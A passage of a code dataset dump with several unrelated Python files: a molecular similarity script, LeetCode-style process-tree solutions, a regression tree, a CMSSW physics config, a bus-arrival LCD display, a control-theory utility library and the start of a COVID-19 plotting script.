fingerprintHM[ms2][0]\n #simTotal = simTotal +sim\n extremeVals[3] = extremeVals[3]+sim\n if sim < extremeVals[0]:\n #weakestLinkVal = sim\n extremeVals[0] = sim\n #weakestLink[0] = ms\n #extremeVals[0][1] = ms\n #weakestLink[1] = ms2\n #extremeVals[0][2] = ms2\n if sim > extremeVals[1]:\n #strongestLinkVal\n extremeVals[1] = sim\n #strongestLink\n #extremeVals[1][1] = ms\n #strongestLink\n #extremeVals[1][2] = ms2\n #valuesAccountedFor = valuesAccountedFor +1\n extremeVals[2] = extremeVals[2]+1\n return(extremeVals)\n\n\n\n\n\n\ndef getSimilaritiesBetweenFolds(foldArr,csvData,dataPath,foldPath,ouputPath):\n fpsHM = getFingerprintHM(csvData,dataPath,3)\n output = list()\n for fold in range(0,len(foldArr)-1):\n for fold2 in range(fold+1, len(foldArr)):\n output.append(compareFolds(fpsHM,foldPath+foldArr[fold], foldPath+foldArr[fold2]))\n \n now = datetime.datetime.now()\n with open((foldPath+\"foldSimilaritySDF.txt\"),'w+') as newTest:\n newTest.writelines(\"%s\\n\" % item for item in output)\n\n\n\n\n\n\ndef getTrainFiles(foldPath):\n paths = getPaths(foldPath)\n r = re.compile(\".*test\")\n trainPaths = list(filter(r.match, paths))\n return trainPaths\n\n\n\n\n\ndef runner(foldPath,csvPath,dataPath,outputPath):\n trainFiles = getTrainFiles(foldPath)\n getSimilaritiesBetweenFolds(trainFiles,csvPath,dataPath,foldPath,outputPath)\n\n\n\n\ndef getPaths(path):\n paths = list()\n for filename in os.listdir(path):\n paths.append(filename)\n return paths\n\n\nfoldPath = sys.argv[1]\ncsvPath = sys.argv[2]\ndataPath = sys.argv[3]\noutputPath = sys.argv[4]\n\nrunner(foldPath,csvPath,dataPath,outputPath)\n\n","sub_path":"Project/fingerprintSDF.py","file_name":"fingerprintSDF.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"470711753","text":"# Description\n# Given n processes, each process has a unique PID (process id) and its PPID (parent process id).\n# \n# Each process only has one parent process, but may have one or more children processes. This is just like a tree structure. Only one process has PPID that is 0, which means this process has no parent process. All the PIDs will be distinct positive integers.\n# \n# We use two list of integers to represent a list of processes, where the first list contains PID for each process and the second list contains the corresponding PPID.\n# \n# Now given the two lists, and a PID representing a process you want to kill, return a list of PIDs of processes that will be killed in the end. You should assume that when a process is killed, all its children processes will be killed. No order is required for the final answer.\n# \n# The given kill id is guaranteed to be one of the given PIDs.\n# n >= 1.\n## See https://leetcode.com/articles/kill-process/\n\n## IDEA: brute force where you kill a process, find it children and continue\nclass Solution:\n \"\"\"\n @param pid: the process id\n @param ppid: the parent process id\n @param kill: a PID you want to kill\n @return: a list of PIDs of processes that will be killed in the end\n \"\"\"\n def killProcess(self, pid, ppid, kill):\n # Write your code here\n res = [kill]\n if kill == 0:\n res.extend(list(set(pid)))\n return res\n \n parent = [i for i in range(0,len(ppid)) if ppid[i] == kill]\n while len(parent) > 0:\n tmp = parent.pop()\n res.append(pid[tmp])\n tmp_parent = [i for i in range(0,len(ppid)) if ppid[i] == pid[tmp]]\n parent.extend(tmp_parent)\n return res\n\n##############################################################################################\n##############################################################################################\n## IDEA: optimizing the solution using adjList representation of graphs\nfrom collections import defaultdict\nclass Solution:\n \"\"\"\n @param pid: the process id\n @param ppid: the parent process id\n @param kill: a PID you want to kill\n @return: a list of PIDs of processes that will be killed in the end\n \"\"\"\n def killProcess(self, pid, ppid, kill):\n def bfs(frontier, adjList, res):\n if len(frontier) == 0:\n return res\n new_frontier = []\n for f in frontier:\n res.append(f)\n new_frontier.extend(adjList[f])\n return bfs(new_frontier,adjList,res)\n # Write your code here\n res = [kill]\n if kill == 0:\n res.extend(list(set(pid)))\n return res\n \n adjList = defaultdict(list)\n for i in range(0,len(ppid)):\n adjList[ppid[i]].append(pid[i])\n \n return bfs([kill],adjList,[]) ","sub_path":"IQGoogle/src/com/iq/bloomberg/KillProcess.py","file_name":"KillProcess.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"604998326","text":"from __future__ import print_function\nimport Num as num\nimport Lists as lst\nimport Tbl as tbl\nimport itertools\nimport config\nimport Tbl\nfrom Tbl import Tbl\n\nthe = config\n\nclass Range:\n def __init__(self, t, yfun, pos, attr, val):\n self._t = t\n self._kids = []\n self.yfun = yfun\n self.pos = pos\n self.attr = attr\n self.val = val\n self.stats = num.c().updates(t.rows, yfun)\n\ndef create(t, yfun, pos=None, attr=None, val=None):\n return Range(t, yfun, pos, attr, val)\n\ndef fun(x): return x.val\n\ndef order(t, y):\n\n def xpect(col):\n tmp = 0\n for _, x in col.nums.items():\n tmp = tmp + x.sd * x.n / col.n\n return tmp\n\n def whatif(head, y):\n class Detail:\n def __init__(self, head):\n self.pos = head.pos\n self.what = head.txt\n self.nums = {}\n self.n = 0\n\n col = Detail(head)\n for _, row in enumerate(t.rows):\n x = row.cells[col.pos]\n if x != '?':\n col.n = col.n + 1\n p = col.nums.get(x) or num.c()\n p.update(y(row))\n col.nums[x] = p\n\n class KeyVal:\n def __init__(self, key, val):\n self.key = key\n self.val = val\n\n return KeyVal(xpect(col), col)\n\n out = []\n for _,h in enumerate(t.x.cols):\n out.append(whatif(h,y))\n out = sorted(out, key=lambda x: x.key)\n return lst.collect(out, fun)\n\ndef grow1(above, yfun, rows, lvl, b4, pos=None, attr=None, val=None):\n def pad(): return ':20'.format(itertools.repeat('| ', lvl))\n def likeAbove():\n return above._t.copy(rows)\n if len(rows) >= 2:\n if lvl <= 10:\n here = above if (lvl == 0) else create(likeAbove(), yfun, pos, attr, val)\n if here.stats.sd < b4:\n if lvl > 0:\n above._kids.append(here)\n cuts = order(here._t, yfun)\n cut = cuts[1].val\n kids = {}\n for _, r in enumerate(rows):\n val = r.cells[cut.pos]\n if val != '?':\n rows1 = kids.get(val) if kids.get(val) != None else []\n rows1.append(r)\n kids[val] = (rows1)\n for val, rows1 in kids.items():\n if len(rows1) < len(rows):\n grow1(here, yfun, rows1, lvl + 1, here.stats.sd, cut.pos, cut.what, val)\n\ndef grow(t, y):\n yfun = y\n root = create(t,yfun)\n grow1(root, yfun, t.rows,0,2**32)\n return root\n\ndef leaf(tr,cells, bins, lvl):\n lvl=lvl if lvl != 0 else 0\n for j,kid in enumerate(tr._kids):\n pos,val = kid.pos, kid.val\n if cells[kid.pos] == kid.val:\n return leaf(kid, cells, bins, lvl+1)\n return tr\n\ndef tprint(tr, lvl=0):\n def pad():\n return \"| \" * (lvl - 1)\n\n def left(x):\n return \"%-20s\" % x\n\n lvl = lvl or 0\n suffix = \"\"\n if len(tr._kids) == 0 or lvl == 0:\n suffix = \"n=%s mu=%-.2f sd=%-.2f\" % (tr.stats.n, tr.stats.mu, tr.stats.sd)\n if lvl == 0:\n print(\"\\n{}\".format(suffix))\n else:\n # must_be = left( \"{}{} = {}\".format(pad(), tr.attr or \"\", tr.val or \"\"))\n print(left(\"{}{} = {}\".format(pad(), str(tr.attr) or \"\", str(tr.val) or \"\")), suffix, sep='\\t:\\t ')\n for j in range(len(tr._kids)):\n tprint(tr._kids[j], lvl + 1)\n\n\ndef treePrint(tr, lvl=0):\n\n def pad():\n return \"| \" * (lvl)\n\n def left(x):\n return \"%-20s\" % x\n\n suffix = \"\"\n if len(tr._kids) == 0 or lvl == 0:\n suffix = \"n=%s mu=%-.2f sd=%-.2f\" % (tr.stats.n, tr.stats.mu, tr.stats.sd)\n if lvl == 0:\n print\n \"\\n\" + suffix\n else:\n print\n left(\n \"{}{} = {}\".format(pad(), str(tr.attr) or \"\", str(tr.val) or \"\")), '\\t: ', suffix\n for j in range(len(tr._kids)):\n treePrint(tr._kids[j], lvl + 1)\n\n\ndef test(f, y):\n the.tree_min = 10\n y = y or \"dom\"\n f = f or \"auto.csv\"\n\n tb1 = Tbl(f)\n t2 = tb1.discretizeRows(y, tb1)\n\n # for head in t2.x.cols:\n # if head.bins:\n # print(len(head.bins), head.txt)\n\n tr = grow(t2, y=t2.dom(tb1))\n tprint(tr)\n #show(tr)\n# print(t2.spec)\nif __name__ == \"__main__\":\n test(\"/home/rahulgutal4/auto.csv\", \"dom\")","sub_path":"HW5/SdTree.py","file_name":"SdTree.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"542053893","text":"import FWCore.ParameterSet.Config as cms\nprocess = cms.Process('HiForest')\nprocess.options = cms.untracked.PSet(\n # wantSummary = cms.untracked.bool(True)\n #SkipEvent = cms.untracked.vstring('ProductNotFound')\n)\n\n#####################################################################################\n# HiForest labelling info\n#####################################################################################\n\nprocess.load(\"HeavyIonsAnalysis.JetAnalysis.HiForest_cff\")\nprocess.HiForest.inputLines = cms.vstring(\"HiForest V3\",)\nimport subprocess\nversion = subprocess.Popen([\"(cd $CMSSW_BASE/src && git describe --tags)\"], stdout=subprocess.PIPE, shell=True).stdout.read()\nif version == '':\n version = 'no git info'\nprocess.HiForest.HiForestVersion = cms.untracked.string(version)\n\n\n#####################################################################################\n# Input source\n#####################################################################################\n\nprocess.source = cms.Source(\"PoolSource\",\n duplicateCheckMode = cms.untracked.string(\"noDuplicateCheck\"),\n fileNames = cms.untracked.vstring(\"file:/uscms_data/d3/jiansun/data/1CC46C43-99B9-E311-B9CF-FA163E4A10E1_highpt_rereco_run181913.root\")\n # fileNames = cms.untracked.vstring(\"file:hiReco_RAW2DIGI_L1Reco_RECO_1001_2_8Ow.root\")\n )\n\n# Number of events we want to process, -1 = all events\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(10))\n\n\n#####################################################################################\n# Load Global Tag, Geometry, etc.\n#####################################################################################\n\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('Configuration.Geometry.GeometryDB_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_38T_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\n\nprocess.load('Configuration.StandardSequences.Digi_cff')\nprocess.load('Configuration.StandardSequences.SimL1Emulator_cff')\nprocess.load('Configuration.StandardSequences.DigiToRaw_cff')\nprocess.load('Configuration.StandardSequences.RawToDigi_cff')\nprocess.load('Configuration.StandardSequences.ReconstructionHeavyIons_cff')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\n\n# PbPb 53X MC\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'GR_R_53_LV6::All', '')\n\nfrom HeavyIonsAnalysis.Configuration.CommonFunctions_cff import *\noverrideGT_PbPb2760(process)\noverrideJEC_pp2760(process)\n\nprocess.HeavyIonGlobalParameters = cms.PSet(\n centralityVariable = cms.string(\"HFtowers\"),\n nonDefaultGlauberModel = cms.string(\"\"),\n centralitySrc = cms.InputTag(\"hiCentrality\")\n )\n\n#####################################################################################\n# Define tree output\n#####################################################################################\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName=cms.string(\"HiForest_reduce.root\"))\n\nprocess.load('HeavyIonsAnalysis.JetAnalysis.TrkAnalyzers_cff')\n\n#####################################################################################\n\n#########################\n# Track Analyzer\n#########################\nprocess.anaTrack.qualityStrings = cms.untracked.vstring('highPurity','highPuritySetWithPV')\n\n# set track collection to iterative tracking\nprocess.anaTrack.trackSrc = cms.InputTag(\"hiGeneralTracks\")\n\n# clusters missing in recodebug - to be resolved\nprocess.anaTrack.doPFMatching = False\n\n\n######################\n\nprocess.load('HeavyIonsAnalysis.EventAnalysis.hievtanalyzer_data_cfi')\nprocess.load('HeavyIonsAnalysis.EventAnalysis.hltanalysis_cff')\nprocess.load('HeavyIonsAnalysis.JetAnalysis.EventSelection_cff')\n\n#Filtering\n# Minimum bias trigger selection (later runs)\nprocess.load(\"HLTrigger.HLTfilters.hltHighLevel_cfi\")\nprocess.hltMinBiasHFOrBSC = process.hltHighLevel.clone()\nprocess.hltMinBiasHFOrBSC.HLTPaths = [\"HLT_HIMinBiasHfOrBSC_v1\"]\nprocess.load(\"HeavyIonsAnalysis.Configuration.collisionEventSelection_cff\")\n\nprocess.skimanalysis.superFilters = cms.vstring(\"ana_step\")\n\nprocess.photonStep = cms.Sequence(process.hiGoodTracks * process.photon_extra_reco * process.makeHeavyIonPhotons * process.selectedPatPhotons)\nprocess.photonStep.remove(process.interestingTrackEcalDetIds)\nprocess.photonStep.remove(process.photonMatch)\nprocess.photonStep.remove(process.seldigis)\nprocess.reducedEcalRecHitsEB = cms.EDProducer(\"ReducedRecHitCollectionProducer\",\n interestingDetIdCollections = cms.VInputTag(cms.InputTag(\"interestingEcalDetIdEB\"), cms.InputTag(\"interestingEcalDetIdEBU\")),\n recHitsLabel = cms.InputTag(\"ecalRecHit\",\"EcalRecHitsEB\"),\n reducedHitsCollection = cms.string('')\n)\nprocess.reducedEcalRecHitsEE = cms.EDProducer(\"ReducedRecHitCollectionProducer\",\n interestingDetIdCollections = cms.VInputTag(cms.InputTag(\"interestingEcalDetIdEE\")),\n recHitsLabel = cms.InputTag(\"ecalRecHit\",\"EcalRecHitsEE\"),\n reducedHitsCollection = cms.string('')\n)\n\nprocess.pcollisionEventSelection = cms.Path(process.collisionEventSelection)\nprocess.pHBHENoiseFilter = cms.Path( process.HBHENoiseFilter )\nprocess.phfCoincFilter = cms.Path(process.hfCoincFilter )\nprocess.phfCoincFilter3 = cms.Path(process.hfCoincFilter3 )\nprocess.pprimaryVertexFilter = cms.Path(process.primaryVertexFilter )\nprocess.phltPixelClusterShapeFilter = cms.Path(process.siPixelRecHits*process.hltPixelClusterShapeFilter )\nprocess.phiEcalRecHitSpikeFilter = cms.Path(process.hiEcalRecHitSpikeFilter )\n\n\nprocess.ana_step = cms.Path(process.photonStep *\n process.hltanalysis *\n process.hltobject *\n process.hiEvtAnalyzer *\n#temp process.hltMuTree +\n process.HiForest \n )\n\nprocess.pAna = cms.EndPath(process.skimanalysis)\n\n\n\n","sub_path":"runForest_PbPb_DATA_53X_reduce.py","file_name":"runForest_PbPb_DATA_53X_reduce.py","file_ext":"py","file_size_in_byte":6117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"635054455","text":"#!/usr/bin python3\n# -*- coding: utf-8 -*-\n\n# 12/02/2020 bus stop passenger information screen\n\nimport time\nimport datetime\nimport requests\nimport json\nimport I2C_LCD_driver\nfrom gpiozero import CPUTemperature\ncpu = CPUTemperature()\nmylcd = I2C_LCD_driver.lcd()\n\n# turkish \"Ç\" character.\nturkcec = [\n [0b01110,\n 0b10001,\n 0b10000,\n 0b10000,\n 0b10000,\n 0b10001,\n 0b01110,\n 0b00100],\n]\n\nmylcd.lcd_display_string(\"INT BAGLANTISI\", 1)\nmylcd.lcd_display_string(\"KURULDU\", 2)\ntime.sleep(1.5)\nmylcd.lcd_clear()\n\ndef get_otobus(durak):\n parsed = None\n url = \"https://service.kentkart.com//api/bus/closest?accuracy=0&authType=1&busStopId=\" + durak + \"&lang=tr&lat=0&lng=0&nfcSupport=0®ion=007&token='PERSONAL TOKEN HERE'&version=WEB_4.0_2\"\n response = requests.get(url)\n data = response.text\n parsed = json.loads(data)\n otobusler = []\n for i in range(len(parsed[\"busList\"])): # appends buses to .\n if parsed[\"busList\"][i][\"disabledPerson\"] == 0: # checks if it can carry disabled passenger.\n otobusler.append(\n str(parsed[\"busList\"][i][\"displayRouteCode\"]) + \" \" + parsed[\"busList\"][i][\"stopDiff\"] + \"drk \" +\n parsed[\"busList\"][i][\"timeDiff\"] + \"dk \" + \"E\")\n else:\n otobusler.append(\n str(parsed[\"busList\"][i][\"displayRouteCode\"]) + \" \" + parsed[\"busList\"][i][\"stopDiff\"] + \"drk \" +\n parsed[\"busList\"][i][\"timeDiff\"] + \"dk\")\n return otobusler\n\nwhile True:\n try:\n while True:\n kentkart = get_otobus(\"BUS STOP ID HERE\")\n starttime = time.time()\n while len(kentkart) > 0:\n for x in range(0, len(kentkart), 2):\n mylcd.lcd_clear()\n # first line of lcd\n if kentkart[x][0] == \"Ç\": # all of the bus ids start with 'Ç' here so no need to check actually\n mylcd.lcd_load_custom_chars(turkcec)\n mylcd.lcd_write(0x80)\n mylcd.lcd_write_char(0)\n mylcd.lcd_display_string(kentkart[x][1:], 1, 1)\n else:\n mylcd.lcd_display_string(kentkart[x], 1)\n if x == len(kentkart) - 1:\n time.sleep(11)\n break\n # second line of lcd\n if kentkart[x + 1][0] == \"Ç\": \n mylcd.lcd_load_custom_chars(turkcec)\n mylcd.lcd_write(0xc0)\n mylcd.lcd_write_char(0)\n mylcd.lcd_display_string(kentkart[x + 1][1:], 2, 1)\n else:\n mylcd.lcd_display_string(kentkart[x + 1], 2)\n time.sleep(11)\n\n if (\n time.time() - starttime) >= 11.0: # api refreshes busses location every 11seconds so to update we check if its been 11secs.\n starttime = time.time()\n kentkart = get_otobus(\"BUS STOP ID HERE\")\n else:\n mylcd.lcd_clear()\n while True: # display date, time and cpu temp while theres no bus to show.\n kentkart = get_otobus(\"BUS STOP ID HERE\")\n mylcd.lcd_display_string(time.strftime(\"%d/%m/%Y\"), 1,3)\n mylcd.lcd_display_string(time.strftime(\"%H:%M:%S\" + \" T:\" + \"{:.1f}\".format(cpu.temperature)), 2)\n mylcd.lcd_write_char(223,1)\n time.sleep(1)\n if len(kentkart) > 0:\n break\n continue\n\n except requests.exceptions.ConnectionError:\n mylcd.lcd_display_string(\"INTERNET \", 1)\n mylcd.lcd_display_string(\"BAGLANTISI YOK \", 2)\n continue\n except:\n mylcd.lcd_display_string(\"BIR SORUN OLDU \", 1)\n mylcd.lcd_display_string(\"AMA NE BILMIYORM\", 2)\n continue\n","sub_path":"busstop.py","file_name":"busstop.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"221420314","text":"\"\"\"\nThis is a procedural interface to the ctrl_utils library\n\nroberto.bucher@supsi.ch\n\nThe following commands are provided:\n\nDesign and plot commands\n full_obs - full order observer\n red_obs - reduced order observer\n comp_form - state feedback controller+observer in compact form\n comp_form_i - state feedback controller+observer+integ in compact form\n set_aw - introduce anti-windup into controller\n grstep - graphical step response\n init_par - get xi and wn fron os and Ts\n xi2os - get os from xi\n os2xi - get xi from os\n ts2wn - get wn from xi and ts\n wn2ts - get ts from xi and wn\n\"\"\"\n\nfrom numpy import hstack, vstack, imag, zeros, eye, mat, shape, pi, sqrt, log, exp, isscalar, linspace\nfrom scipy import poly \nfrom scipy.linalg import inv, eigvals\nimport matplotlib.pyplot as plt\nfrom control import TransferFunction, StateSpace, ss, tf, step_response, place\n\ndef full_obs(sys,poles):\n \"\"\"Full order observer of the system sys\n\n Call:\n obs=full_obs(sys,poles)\n\n Parameters\n ----------\n sys : System in State Space form\n poles: desired observer poles\n\n Returns\n -------\n obs: ss\n Observer\n\n \"\"\"\n if isinstance(sys, TransferFunction):\n \"System must be in state space form\"\n return\n a=mat(sys.A)\n b=mat(sys.B)\n c=mat(sys.C)\n d=mat(sys.D)\n L=place(a.T,c.T,poles)\n L=mat(L).T\n Ao=a-L*c\n Bo=hstack((b-L*d,L))\n n=shape(Ao)\n m=shape(Bo)\n Co=eye(n[0],n[1])\n Do=zeros((n[0],m[1]))\n obs=StateSpace(Ao,Bo,Co,Do,sys.dt)\n return obs\n\ndef red_obs(sys,T,poles):\n \"\"\"Reduced order observer of the system sys\n\n Call:\n obs=red_obs(sys,T,poles)\n\n Parameters\n ----------\n sys : System in State Space form\n T: Complement matrix\n poles: desired observer poles\n\n Returns\n -------\n obs: ss\n Reduced order Observer\n\n \"\"\"\n if isinstance(sys, TransferFunction):\n \"System must be in state space form\"\n return\n a=mat(sys.A)\n b=mat(sys.B)\n c=mat(sys.C)\n d=mat(sys.D)\n T=mat(T)\n P=mat(vstack((c,T)))\n invP=inv(P)\n AA=P*a*invP\n ny=shape(c)[0]\n nx=shape(a)[0]\n nu=shape(b)[1]\n\n A11=AA[0:ny,0:ny]\n A12=AA[0:ny,ny:nx]\n A21=AA[ny:nx,0:ny]\n A22=AA[ny:nx,ny:nx]\n\n L1=place(A22.T,A12.T,poles)\n L1=mat(L1).T\n\n nn=nx-ny\n\n tmp1=mat(hstack((-L1,eye(nn,nn))))\n tmp2=mat(vstack((zeros((ny,nn)),eye(nn,nn))))\n Ar=tmp1*P*a*invP*tmp2\n \n tmp3=vstack((eye(ny,ny),L1))\n tmp3=mat(hstack((P*b,P*a*invP*tmp3)))\n tmp4=hstack((eye(nu,nu),zeros((nu,ny))))\n tmp5=hstack((-d,eye(ny,ny)))\n tmp4=mat(vstack((tmp4,tmp5)))\n\n Br=tmp1*tmp3*tmp4\n\n Cr=invP*tmp2\n\n tmp5=hstack((zeros((ny,nu)),eye(ny,ny)))\n tmp6=hstack((zeros((nn,nu)),L1))\n tmp5=mat(vstack((tmp5,tmp6)))\n Dr=invP*tmp5*tmp4\n \n obs=StateSpace(Ar,Br,Cr,Dr,sys.dt)\n return obs\n\ndef comp_form(sys,obs,K):\n \"\"\"Compact form Conroller+Observer\n\n Call:\n contr=comp_form(sys,obs,K)\n\n Parameters\n ----------\n sys : System in State Space form\n obs : Observer in State Space form\n K: State feedback gains\n\n Returns\n -------\n contr: ss\n Controller\n\n \"\"\"\n nx=shape(sys.A)[0]\n ny=shape(sys.C)[0]\n nu=shape(sys.B)[1]\n no=shape(obs.A)[0]\n\n Bu=mat(obs.B[:,0:nu])\n By=mat(obs.B[:,nu:])\n Du=mat(obs.D[:,0:nu])\n Dy=mat(obs.D[:,nu:])\n\n X=inv(eye(nu,nu)+K*Du)\n\n Ac = mat(obs.A)-Bu*X*K*mat(obs.C);\n Bc = hstack((Bu*X,By-Bu*X*K*Dy))\n Cc = -X*K*mat(obs.C);\n Dc = hstack((X,-X*K*Dy))\n contr = StateSpace(Ac,Bc,Cc,Dc,sys.dt)\n return contr\n\ndef comp_form_i(sys,obs,K,Cy=[[1]]):\n \"\"\"Compact form Conroller+Observer+Integral part\n Only for discrete systems!!!\n\n Call:\n contr=comp_form_i(sys,obs,K [,Cy])\n\n Parameters\n ----------\n sys : System in State Space form\n obs : Observer in State Space form\n K: State feedback gains\n Cy: feedback matric to choose the output for integral part\n\n Returns\n -------\n contr: ss\n Controller\n\n \"\"\"\n if sys.dt==None:\n print('contr_form_i works only with discrete systems!')\n return\n \n Ts = sys.dt\n ny=shape(sys.C)[0]\n nu=shape(sys.B)[1]\n nx=shape(sys.A)[0]\n no=shape(obs.A)[0]\n ni=shape(mat(Cy))[0]\n\n B_obsu = mat(obs.B[:,0:nu])\n B_obsy = mat(obs.B[:,nu:nu+ny])\n D_obsu = mat(obs.D[:,0:nu])\n D_obsy = mat(obs.D[:,nu:nu+ny])\n\n k=mat(K)\n nk=shape(k)[1]\n Ke=k[:,nk-ni:]\n K=k[:,0:nk-ni]\n X = inv(eye(nu,nu)+K*D_obsu);\n\n a=mat(obs.A)\n c=mat(obs.C)\n Cy=mat(Cy)\n\n tmp1=hstack((a-B_obsu*X*K*c,-B_obsu*X*Ke))\n\n tmp2=hstack((zeros((ni,no)),eye(ni,ni)))\n A_ctr=vstack((tmp1,tmp2))\n\n tmp1=hstack((zeros((no,ni)),-B_obsu*X*K*D_obsy+B_obsy))\n tmp2=hstack((eye(ni,ni)*Ts,-Cy*Ts))\n B_ctr=vstack((tmp1,tmp2))\n\n C_ctr=hstack((-X*K*c,-X*Ke))\n D_ctr=hstack((zeros((nu,ni)),-X*K*D_obsy))\n\n contr=StateSpace(A_ctr,B_ctr,C_ctr,D_ctr,sys.dt)\n return contr\n \ndef set_aw(sys,poles):\n \"\"\"Divide in controller in input and feedback part\n for anti-windup\n\n Usage\n =====\n [sys_in,sys_fbk]=set_aw(sys,poles)\n\n Inputs\n ------\n\n sys: controller\n poles : poles for the anti-windup filter\n\n Outputs\n -------\n sys_in, sys_fbk: controller in input and feedback part\n \"\"\"\n sys = ss(sys)\n Ts = sys.dt\n den_old=poly(eigvals(sys.A))\n sys=tf(sys)\n den = poly(poles)\n tmp= tf(den_old,den,sys.dt)\n sys_in=tmp*sys\n sys_in = sys_in.minreal()\n sys_in = ss(sys_in)\n sys_fbk=1-tmp\n sys_fbk = sys_fbk.minreal()\n sys_fbk = ss(sys_fbk)\n return sys_in, sys_fbk\n\ndef grstep(sys, T=None):\n \"\"\"get step response graphically\n\n Usage\n =====\n grstep(sys)\n\n Inputs\n ------\n\n sys: system\n \"\"\"\n if isscalar(T):\n T = linspace(0,T)\n \n t, y = step_response(sys, T)\n plt.plot(t,y),plt.grid()\n plt.show()\n\ndef init_par(os,ts):\n \"\"\"\n Find xi and wn for given os and ts\n\n xi, wn = init_par(os,ts)\n \"\"\"\n xi = -log(os/100)/sqrt(pi**2 + (log(os/100))**2)\n wn = -log(0.02*sqrt(1-xi**2))/(xi*ts)\n return xi, wn\n\ndef xi2os(xi):\n \"\"\"\n Find os from given xi\n\n os = xi2os(xi)\n \"\"\"\n os = 100*exp(-xi*pi/sqrt(1-xi**2))\n return os\n\ndef os2xi(os):\n \"\"\"\n Find xi from given os\n\n xi = xi2os(os)\n \"\"\"\n xi = -log(os/100)/sqrt(pi**2 + (log(os/100))**2)\n return xi\n\ndef ts2wn(ts, xi):\n \"\"\"\n Find wn from given ts and xi\n\n wn = ts2wn(ts, xi)\n \"\"\"\n wn = -log(0.02*sqrt(1-xi**2))/(xi*ts)\n return wn\n\ndef wn2ts(wn, xi):\n \"\"\"\n Find ts from given wn and xi\n\n ts = wn2ts(wn, xi)\n \"\"\"\n ts = -log(0.02*sqrt(1-xi**2))/(xi*wn)\n return ts\n\n","sub_path":"toolbox/supsictrl/src/ctrl_utils.py","file_name":"ctrl_utils.py","file_ext":"py","file_size_in_byte":6719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"577790783","text":"import pandas as pd\nimport matplotlib.pyplot as plt \nimport matplotlib.dates as mdates \nimport numpy as np\nfrom datetime import timedelta\nfrom matplotlib.dates import date2num #-->Update \nfrom matplotlib.colors import ListedColormap\nimport json\nimport matplotlib.dates as dt \nimport geopandas as gpd\nimport datetime\n\nimport shapely.affinity as shp\nimport glob\nimport JHU_dataprocessing_functions as dp\nimport JHU_plotting_functions as jp\nimport os\n\n####--------------------parameters --------------------------------------\nplot_country = True\nplot_states = True\nsave_fig = True\nshow_plot = False\n\nbase_path = os.getcwd()\nfigs_path = os.path.join( base_path, 'figs') \n # daily_path = r'D:\\Code_projects\\Covid19_analysis\\COVID-19\\csse_covid_19_data\\csse_covid_19_daily_reports')\ndaily_path = os.path.join( base_path,\"COVID-19\\\\csse_covid_19_data\\\\csse_covid_19_daily_reports\" )\ndaily_path_us = os.path.join( base_path,\"COVID-19\\\\csse_covid_19_data\\\\csse_covid_19_daily_reports_us\" )\n\n# figure size\nfull_w = (12,7)\nhalf_w = (6,4) \n\ncols = np.array([[213,62,79],\n[244,109,67],\n[253,174,97],\n[254,224,139], \n[171,221,164], \n[50,136,189]]) /255 \ncols = np.flipud(cols)\ncmap = ListedColormap(cols) \n\nthreshold_cases = 100\nthreshold_deaths = 25\nthreshold_deaths_state = 10\n\n\n# ticks \ntick_list = [1e2,2e2,5e2,1e3,2e3,5e3,1e4,2e4,5e4,1e5,2e5,5e5,1e6,2e6,5e6,]\ntick_label_list = [100,200,500, 1000,2000,5000, '10k','20k','50k', '100k','200k','500k','1m','2m','5m']\n\n# doubling rate average period \naveraging_period = 3\n\n# china artificial days since day 0, next + china_ad\nchina_add = 6\n\n# annotation properties of figures\nbbox_props = dict(boxstyle=\"round,pad=0.1\", fc=\"w\", ec=\"w\", lw=2, alpha = 0.5)\n\nnotable_countries = ['US','Italy','Spain','China', 'France','Germany','Iran',\n 'United Kingdom','Switzerland','Turkey','Netherlands','Austria',\n 'Korea, South','Brazil' ,'Sweden','Japan',\n 'Dominican Republic', 'Russia','Ukraine' ]\n\n # compute doubling rate \nbin_array = np.array( [-1, 2.**(1./20), 2.**(1./15), 2.**(1./10), 2.**(1./7), 2.**(1./5) ,np.inf ]) \nbin_labels = ['20','15','10','7','5' ]\n\ndot_col = np.ones((3))*0.8 \nemph_col = [0.5,0.5,0.5] \ngoal_col = \"r\"\ndot_alpha = 1 \n\n\n \nif __name__ == '__main__':\n print('run script directly') \n \n # ---------------------------------------------------------\n # --------------merge and process data---------------------\n # ---------------------------------------------------------\n\n # path = r'D:\\Code_projects\\Covid19_analysis\\COVID-19\\csse_covid_19_data\\csse_covid_19_time_series'\n time_path = os.path.join( base_path,\"COVID-19\\\\csse_covid_19_data\\\\csse_covid_19_time_series\" )\n\n file_list = ['time_series_covid19_confirmed_global.csv',\n 'time_series_covid19_deaths_global.csv',\n 'time_series_covid19_recovered_global.csv'] \n\n # merge data \n df_country = dp.merge_countrydf(time_path, file_list) \n\n # remove diamond princess \n bool_other = df_country['Country/Region'].str.contains( 'Princess' , regex=False)\n df_country.drop( df_country[bool_other].index, inplace=True) \n\n # compute delta days\n df_country['Delta C'] = dp.days_since_threshold( df_country['Date'],\n df_country['Confirmed'],\n df_country['Country/Region'] , \n threshold_cases) \n\n df_country['Delta D'] = dp.days_since_threshold( df_country['Date'],\n df_country['Death'],\n df_country['Country/Region'] , \n threshold_deaths)\n\n # remove days from china to make plots look better \n bool_nochina = df_country['Country/Region']!= 'China'\n xCmax = df_country.loc[bool_nochina,'Delta C'].max()\n xDmax = df_country.loc[bool_nochina,'Delta D'].max()\n \n last_day = df_country['Date'].unique()[-1] \n\n # bool_last = df_country['Date'] == last_day \n bool_cases= 